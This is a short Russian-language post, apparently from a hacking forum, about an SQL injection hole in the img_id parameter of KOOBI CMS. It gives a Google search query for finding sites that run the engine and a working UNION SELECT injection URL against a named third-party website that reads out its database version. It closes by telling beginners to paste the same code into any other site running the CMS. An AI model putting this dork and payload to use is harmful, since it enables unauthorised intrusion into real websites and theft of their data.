KOOBI CMS

уязвимость в параметре img_id

пример поиска уязвимых сайтов в гугле

allinurl:"index.php?p=gallerypic" результатов порядка 4500 тыс. !!!

Пример уязвимого сайта:

код:

http://www.ria-alliance.com.ua/index.php?p=gallerypic&img_id=-84+union+select+1,2,3,version(),5,6,7,8,9/*&galid=3&area=1&ascdesc=desc
________________________

для новичков!

чтоб увидеть инъекцию в действии на любом другом сайте работающем на этом движке,достаточно вставить код обозначеный красным цветом в примере уязвимого сайта.